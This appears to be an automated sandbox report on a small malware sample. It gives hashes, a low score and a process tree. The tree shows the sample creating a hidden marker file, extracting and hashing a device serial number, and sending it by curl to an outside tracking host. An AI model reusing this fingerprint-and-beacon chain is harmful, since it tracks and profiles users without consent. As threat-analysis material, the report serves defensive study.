Analysis

  • max time kernel
    148s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    29-07-2024 07:40

General

  • Target

    3c6492a33885e363cae2841e0597c730_JaffaCakes118

  • Size

    10KB

  • MD5

    3c6492a33885e363cae2841e0597c730

  • SHA1

    99d5f88fb1a33f321aa614cfe792200bdf9eba5c

  • SHA256

    ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49

  • SHA512

    302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193

  • SSDEEP

    192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP

Score
3/10

Malware Config

Signatures

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
    /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
    1⤵
      PID:1525
      • /usr/bin/touch
        touch "/root/Library/Application Support/.upd2029"
        2⤵
          PID:1527
        • /usr/bin/openssl
          openssl md5
          2⤵
            PID:1532
          • /usr/bin/tr
            tr -d "\\n"
            2⤵
              PID:1531
            • /usr/bin/awk
              awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"
              2⤵
              • Reads runtime system information
              PID:1530
            • /usr/bin/curl
              curl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
              2⤵
                PID:1534

            Network

            MITRE ATT&CK Matrix

            Replay Monitor

            Loading Replay Monitor...

            Downloads